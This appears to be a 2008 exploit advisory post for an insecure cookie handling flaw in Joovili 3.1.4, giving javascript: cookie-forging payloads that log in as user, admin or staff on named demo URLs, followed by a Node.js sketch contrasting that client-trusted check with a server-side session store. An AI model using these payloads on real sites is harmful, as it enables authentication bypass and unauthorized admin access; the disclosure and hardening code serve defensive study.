"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Sunday, 2 November 2008

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6955

Discovered By: ZoRLu

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
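
The cookie assignments above can only have an effect if the server accepts values such as session_admin=true from the browser as proof of login. As an added example (not Joovili's code, which this page does not show), the Node.js sketch below contrasts that assumed check with a server-side session store. parseCookies, naiveIsAdmin, SessionStore and the sid cookie are hypothetical names.

```javascript
const nodeCrypto = require('crypto');

// Parse a Cookie request header into a name -> value map.
function parseCookies(header) {
  const out = Object.create(null);
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Flawed pattern (assumed): authorization state is read straight from the client.
function naiveIsAdmin(cookieHeader) {
  return parseCookies(cookieHeader).session_admin === 'true';
}

// Hardened pattern: the cookie carries only an unguessable token;
// username, role and expiry are kept on the server.
class SessionStore {
  constructor(ttlMs = 30 * 60 * 1000) {
    this.ttlMs = ttlMs;
    this.sessions = new Map();
  }
  // Call only after the credentials have been verified. Returns a Set-Cookie value.
  create(username, role, now = Date.now()) {
    const token = nodeCrypto.randomBytes(32).toString('hex');
    this.sessions.set(token, { username, role, expires: now + this.ttlMs });
    return `sid=${token}; Path=/; HttpOnly; Secure; SameSite=Lax`;
  }
  // Returns the server-side record, or null for unknown or expired tokens.
  lookup(cookieHeader, now = Date.now()) {
    const token = parseCookies(cookieHeader).sid;
    const s = typeof token === 'string' ? this.sessions.get(token) : undefined;
    if (!s) return null;
    if (s.expires <= now) { this.sessions.delete(token); return null; }
    return s;
  }
  isAdmin(cookieHeader, now) {
    const s = this.lookup(cookieHeader, now);
    return s !== null && s.role === 'admin';
  }
}

// Constructed sample input: the admin cookie names and values from the advisory.
const forged = 'session_admin_id=1; session_admin_username=admin; session_admin=true';
```

With the store, a request carrying only the advisory's cookies has no matching server-side record and is treated as unauthenticated.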
